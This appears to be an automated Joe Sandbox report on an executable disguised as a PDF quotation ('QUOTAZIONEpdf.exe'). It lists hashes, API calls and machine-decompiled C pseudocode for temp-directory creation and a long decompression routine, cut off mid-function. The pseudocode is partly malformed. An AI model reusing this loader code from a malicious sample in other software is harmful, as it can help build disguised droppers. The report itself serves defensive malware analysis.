                • API ID: File$CreatePathProtectReadTempVirtual
                • String ID:
                • API String ID: 205760209-0
                • Opcode ID: 1f529c657086bcbf0f0fd90e84cc92244e1a9edd744c606686b3d3ad68f0f74d
                • Instruction ID: de0bd2a9576c58f6b1c284d570405a9ef26125e1e8079dd39ffbdcd19e2f4782
                • Opcode Fuzzy Hash: 1f529c657086bcbf0f0fd90e84cc92244e1a9edd744c606686b3d3ad68f0f74d
                • Instruction Fuzzy Hash: 27310871E10209ABEB10CBB0CC51BEE7339EF54740F00946CE209EB2D0EA796B01C765
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 84%
                			E004031F1(void* __eflags) {
                				void* _t2;
                				void* _t5;
                				CHAR* _t6;
                
                				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                				E00405CE3(_t6);
                				_t2 = E004055E5(_t6);
                				if(_t2 != 0) {
                					E00405578(_t6);
                					CreateDirectoryA(_t6, 0); // executed
                					_t5 = E0040578B("1033", _t6); // executed
                					return _t5;
                				} else {
                					return _t2;
                				}
                			}







                APIs
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Char$Next$CreateDirectoryPrev
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                • API String ID: 4115351271-1075807775
                • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 618 406481-406487 619 406489-40648b 618->619 620 40648c-4064aa 618->620 619->620 621 4066b8-4066cd 620->621 622 40677d-40678a 620->622 624 4066e7-4066fd 621->624 625 4066cf-4066e5 621->625 623 4067b4-4067b8 622->623 627 406818-40682b 623->627 628 4067ba-4067db 623->628 626 406700-406707 624->626 625->626 629 406709-40670d 626->629 630 40672e 626->630 631 406734-40673a 627->631 632 4067f4-406807 628->632 633 4067dd-4067f2 628->633 634 406713-40672b 629->634 635 4068bc-4068c6 629->635 630->631 641 4068e7 631->641 642 405edf 631->642 637 40680a-406811 632->637 633->637 634->630 640 4068d2-4068e5 635->640 638 4067b1 637->638 639 406813 637->639 638->623 653 406796-4067ae 639->653 654 4068c8 639->654 644 4068ea-4068ee 640->644 641->644 645 405ee6-405eea 642->645 646 406026-406047 642->646 647 405f8b-405f8f 642->647 648 405ffb-405fff 642->648 645->640 655 405ef0-405efd 645->655 646->621 651 405f95-405fae 647->651 652 40683b-406845 647->652 649 406005-406019 648->649 650 40684a-406854 648->650 657 40601c-406024 649->657 650->640 658 405fb1-405fb5 651->658 652->640 653->638 654->640 655->641 656 405f03-405f49 655->656 659 405f71-405f73 656->659 660 405f4b-405f4f 656->660 657->646 657->648 658->647 661 405fb7-405fbd 658->661 664 405f81-405f89 659->664 665 405f75-405f7f 659->665 662 405f51-405f54 GlobalFree 660->662 663 405f5a-405f68 GlobalAlloc 660->663 666 405fe7-405ff9 661->666 667 405fbf-405fc6 661->667 662->663 663->641 668 405f6e 663->668 664->658 665->664 665->665 666->657 669 405fd1-405fe1 GlobalAlloc 667->669 670 405fc8-405fcb GlobalFree 667->670 668->659 669->641 669->666 670->669
                C-Code - Quality: 99%
                			E00406481() {
                				signed int _t530;
                				void _t537;
                				signed int _t538;
                				signed int _t539;
                				unsigned short _t569;
                				signed int _t579;
                				signed int _t607;
                				void* _t627;
                				signed int _t628;
                				signed int _t635;
                				signed int* _t643;
                				void* _t644;
                
                				L0:
                				while(1) {
                					L0:
                					_t530 =  *(_t644 - 0x30);
                					if(_t530 >= 4) {
                					}
                					 *(_t644 - 0x40) = 6;
                					 *(_t644 - 0x7c) = 0x19;
                					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                					while(1) {
                						L145:
                						 *(_t644 - 0x50) = 1;
                						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                						while(1) {
                							L149:
                							if( *(_t644 - 0x48) <= 0) {
                								goto L155;
                							}
                							L150:
                							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                							 *(_t644 - 0x54) = _t643;
                							_t569 =  *_t643;
                							_t635 = _t569 & 0x0000ffff;
                							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                							if( *(_t644 - 0xc) >= _t607) {
                								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                								_t628 = _t627 + 1;
                								 *_t643 = _t569 - (_t569 >> 5);
                								 *(_t644 - 0x50) = _t628;
                							} else {
                								 *(_t644 - 0x10) = _t607;
                								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                							}
                							if( *(_t644 - 0x10) >= 0x1000000) {
                								L148:
                								_t487 = _t644 - 0x48;
                								 *_t487 =  *(_t644 - 0x48) - 1;
                								L149:
                								if( *(_t644 - 0x48) <= 0) {
                									goto L155;
                								}
                								goto L150;
                							} else {
                								L154:
                								L146:
                								if( *(_t644 - 0x6c) == 0) {
                									L169:
                									 *(_t644 - 0x88) = 0x18;
                									L170:
                									_t579 = 0x22;
                									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                									_t539 = 0;
                									L172:
                									return _t539;
                								}
                								L147:
                								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                								_t484 = _t644 - 0x70;
                								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                								goto L148;
                							}
                							L155:
                							_t537 =  *(_t644 - 0x7c);
                							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                							while(1) {
                								L140:
                								 *(_t644 - 0x88) = _t537;
                								while(1) {
                									L1:
                									_t538 =  *(_t644 - 0x88);
                									if(_t538 > 0x1c) {
                										break;
                									}
                									L2:
                									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                										case 0:
                											L3:
                											if( *(_t644 - 0x6c) == 0) {
                												goto L170;
                											}
                											L4:
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                											_t538 =  *( *(_t644 - 0x70));
                											if(_t538 > 0xe1) {
                												goto L171;
                											}
                											L5:
                											_t542 = _t538 & 0x000000ff;
                											_push(0x2d);
                											asm("cdq");
                											_pop(_t581);
                											_push(9);
                											_pop(_t582);
                											_t638 = _t542 / _t581;
                											_t544 = _t542 % _t581 & 0x000000ff;
                											asm("cdq");
                											_t633 = _t544 % _t582 & 0x000000ff;
                											 *(_t644 - 0x3c) = _t633;
                											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                											_t641 = (0x300 << _t633 + _t638) + 0x736;
                											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                												L10:
                												if(_t641 == 0) {
                													L12:
                													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                													goto L15;
                												} else {
                													goto L11;
                												}
                												do {
                													L11:
                													_t641 = _t641 - 1;
                													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                												} while (_t641 != 0);
                												goto L12;
                											}
                											L6:
                											if( *(_t644 - 4) != 0) {
                												GlobalFree( *(_t644 - 4));
                											}
                											_t538 = GlobalAlloc(0x40, 0x600); // executed
                											 *(_t644 - 4) = _t538;
                											if(_t538 == 0) {
                												goto L171;
                											} else {
                												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                												goto L10;
                											}
                										case 1:
                											L13:
                											__eflags =  *(_t644 - 0x6c);
                											if( *(_t644 - 0x6c) == 0) {
                												L157:
                												 *(_t644 - 0x88) = 1;
                												goto L170;
                											}
                											L14:
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                											_t45 = _t644 - 0x48;
                											 *_t45 =  *(_t644 - 0x48) + 1;
                											__eflags =  *_t45;
                											L15:
                											if( *(_t644 - 0x48) < 4) {
                												goto L13;
                											}
                											L16:
                											_t550 =  *(_t644 - 0x40);
                											if(_t550 ==  *(_t644 - 0x74)) {
                												L20:
                												 *(_t644 - 0x48) = 5;
                												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                												goto L23;
                											}
                											L17:
                											 *(_t644 - 0x74) = _t550;
                											if( *(_t644 - 8) != 0) {
                												GlobalFree( *(_t644 - 8));
                											}
                											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                											 *(_t644 - 8) = _t538;
                											if(_t538 == 0) {
                												goto L171;
                											} else {
                												goto L20;
                											}
                										case 2:
                											L24:
                											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                											 *(_t644 - 0x84) = 6;
                											 *(_t644 - 0x4c) = _t557;
                											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                											goto L132;
                										case 3:
                											L21:
                											__eflags =  *(_t644 - 0x6c);
                											if( *(_t644 - 0x6c) == 0) {
                												L158:
                												 *(_t644 - 0x88) = 3;
                												goto L170;
                											}
                											L22:
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											_t67 = _t644 - 0x70;
                											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                											__eflags =  *_t67;
                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                											L23:
                											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                											if( *(_t644 - 0x48) != 0) {
                												goto L21;
                											}
                											goto L24;
                										case 4:
                											L133:
                											_t559 =  *_t642;
                											_t626 = _t559 & 0x0000ffff;
                											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                											if( *(_t644 - 0xc) >= _t596) {
                												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                												 *(_t644 - 0x40) = 1;
                												_t560 = _t559 - (_t559 >> 5);
                												__eflags = _t560;
                												 *_t642 = _t560;
                											} else {
                												 *(_t644 - 0x10) = _t596;
                												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                											}
                											if( *(_t644 - 0x10) >= 0x1000000) {
                												goto L139;
                											} else {
                												goto L137;
                											}
                										case 5:
                											L137:
                											if( *(_t644 - 0x6c) == 0) {
                												L168:
                												 *(_t644 - 0x88) = 5;
                												goto L170;
                											}
                											L138:
                											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                											L139:
                											_t537 =  *(_t644 - 0x84);
                											L140:
                											 *(_t644 - 0x88) = _t537;
                											goto L1;
                										case 6:
                											L25:
                											__edx = 0;
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L36:
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) = 1;
                												 *(__ebp - 0x84) = 7;
                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											L26:
                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                											__esi =  *(__ebp - 0x60);
                											__cl = 8;
                											__cl = 8 -  *(__ebp - 0x3c);
                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                											__ecx =  *(__ebp - 0x3c);
                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                											__ecx =  *(__ebp - 4);
                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                											__eflags =  *(__ebp - 0x38) - 4;
                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											if( *(__ebp - 0x38) >= 4) {
                												__eflags =  *(__ebp - 0x38) - 0xa;
                												if( *(__ebp - 0x38) >= 0xa) {
                													_t98 = __ebp - 0x38;
                													 *_t98 =  *(__ebp - 0x38) - 6;
                													__eflags =  *_t98;
                												} else {
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                												}
                											} else {
                												 *(__ebp - 0x38) = 0;
                											}
                											__eflags =  *(__ebp - 0x34) - __edx;
                											if( *(__ebp - 0x34) == __edx) {
                												L35:
                												__ebx = 0;
                												__ebx = 1;
                												goto L61;
                											} else {
                												L32:
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__ecx =  *(__ebp - 8);
                												__ebx = 0;
                												__ebx = 1;
                												__al =  *((intOrPtr*)(__eax + __ecx));
                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                												goto L41;
                											}
                										case 7:
                											L66:
                											__eflags =  *(__ebp - 0x40) - 1;
                											if( *(__ebp - 0x40) != 1) {
                												L68:
                												__eax =  *(__ebp - 0x24);
                												 *(__ebp - 0x80) = 0x16;
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												__eax =  *(__ebp - 0x2c);
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xa;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                												__eax =  *(__ebp - 4);
                												__eax =  *(__ebp - 4) + 0x664;
                												__eflags = __eax;
                												 *(__ebp - 0x58) = __eax;
                												goto L69;
                											}
                											L67:
                											__eax =  *(__ebp - 4);
                											__ecx =  *(__ebp - 0x38);
                											 *(__ebp - 0x84) = 8;
                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                											goto L132;
                										case 8:
                											L70:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xa;
                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                											} else {
                												__eax =  *(__ebp - 0x38);
                												__ecx =  *(__ebp - 4);
                												__eax =  *(__ebp - 0x38) + 0xf;
                												 *(__ebp - 0x84) = 9;
                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                											}
                											goto L132;
                										case 9:
                											L73:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												goto L90;
                											}
                											L74:
                											__eflags =  *(__ebp - 0x60);
                											if( *(__ebp - 0x60) == 0) {
                												goto L171;
                											}
                											L75:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                											__eflags = _t259;
                											0 | _t259 = _t259 + _t259 + 9;
                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                											goto L76;
                										case 0xa:
                											L82:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L84:
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xb;
                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											L83:
                											__eax =  *(__ebp - 0x28);
                											goto L89;
                										case 0xb:
                											L85:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__ecx =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x20);
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                											} else {
                												__eax =  *(__ebp - 0x24);
                											}
                											__ecx =  *(__ebp - 0x28);
                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                											L89:
                											__ecx =  *(__ebp - 0x2c);
                											 *(__ebp - 0x2c) = __eax;
                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                											L90:
                											__eax =  *(__ebp - 4);
                											 *(__ebp - 0x80) = 0x15;
                											__eax =  *(__ebp - 4) + 0xa68;
                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                											goto L69;
                										case 0xc:
                											L99:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L164:
                												 *(__ebp - 0x88) = 0xc;
                												goto L170;
                											}
                											L100:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t334 = __ebp - 0x70;
                											 *_t334 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t334;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											__eax =  *(__ebp - 0x2c);
                											goto L101;
                										case 0xd:
                											L37:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L159:
                												 *(__ebp - 0x88) = 0xd;
                												goto L170;
                											}
                											L38:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t122 = __ebp - 0x70;
                											 *_t122 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t122;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L39:
                											__eax =  *(__ebp - 0x40);
                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                												goto L48;
                											}
                											L40:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												goto L54;
                											}
                											L41:
                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                											__ecx =  *(__ebp - 0x58);
                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                											 *(__ebp - 0x48) = __eax;
                											__eax = __eax + 1;
                											__eax = __eax << 8;
                											__eax = __eax + __ebx;
                											__esi =  *(__ebp - 0x58) + __eax * 2;
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edx = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												 *(__ebp - 0x40) = 1;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												__ebx = __ebx + __ebx + 1;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edx;
                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L39;
                											} else {
                												L45:
                												goto L37;
                											}
                										case 0xe:
                											L46:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L160:
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											L47:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t156 = __ebp - 0x70;
                											 *_t156 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t156;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											while(1) {
                												L48:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													break;
                												}
                												L49:
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t170 = __edx + 1; // 0x1
                													__ebx = _t170;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													continue;
                												} else {
                													L53:
                													goto L46;
                												}
                											}
                											L54:
                											_t173 = __ebp - 0x34;
                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                											__eflags =  *_t173;
                											goto L55;
                										case 0xf:
                											L58:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L161:
                												 *(__ebp - 0x88) = 0xf;
                												goto L170;
                											}
                											L59:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t203 = __ebp - 0x70;
                											 *_t203 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t203;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L60:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												L55:
                												__al =  *(__ebp - 0x44);
                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                												goto L56;
                											}
                											L61:
                											__eax =  *(__ebp - 0x58);
                											__edx = __ebx + __ebx;
                											__ecx =  *(__ebp - 0x10);
                											__esi = __edx + __eax;
                											__ecx =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												_t217 = __edx + 1; // 0x1
                												__ebx = _t217;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L60;
                											} else {
                												L65:
                												goto L58;
                											}
                										case 0x10:
                											L109:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L165:
